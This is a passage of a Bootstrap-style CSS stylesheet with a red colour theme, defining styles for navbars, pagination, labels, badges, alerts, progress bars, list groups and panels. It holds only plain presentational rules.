    padding-right: 0;
  }
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -15px;
  margin-left: -15px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.navbar-brand {
  float: left;
  padding: 17.5px 15px;
  font-size: 18px;
  line-height: 20px;
  height: 55px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -15px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  margin-right: 15px;
  padding: 9px 10px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0px;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  margin-left: -15px;
  margin-right: -15px;
  padding: 10px 15px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    border: 0;
    margin-left: 0;
    margin-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-left: 15px;
    margin-right: 15px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -15px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-brand {
  color: #ffcccc;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ff9999;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #cc0000;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #cc0000;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffcccc;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0px;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
  padding: 0 5px;
  color: #999999;
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0px;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  line-height: 1.42857143;
  text-decoration: none;
  color: #cc0000;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  margin-left: -1px;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  color: #800000;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
  cursor: default;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  background-color: #ffffff;
  border-color: #dddddd;
  cursor: not-allowed;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  list-style: none;
  text-align: center;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  background-color: #ffffff;
  cursor: not-allowed;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #cc0000;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #990000;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  color: #ffffff;
  line-height: 1;
  vertical-align: baseline;
  white-space: nowrap;
  text-align: center;
  background-color: #999999;
  border-radius: 0px;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding: 40px 20px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  border-radius: 0px;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding: 64px 0;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #cc0000;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0px;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  background-color: #fcf8e3;
  border-color: #faebcc;
  color: #c09853;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  overflow: hidden;
  height: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #cc0000;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  zoom: 1;
  overflow: hidden;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  margin-bottom: 20px;
  padding-left: 0;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0px;
  border-bottom-left-radius: 0px;
}
a.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
  text-decoration: none;
  color: #555555;
  background-color: #f5f5f5;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  background-color: #eeeeee;
  color: #999999;
  cursor: not-allowed;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
a.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
a.list-group-item-success.active:hover,
a.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
a.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
a.list-group-item-info.active:hover,
a.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
a.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
a.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0px;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
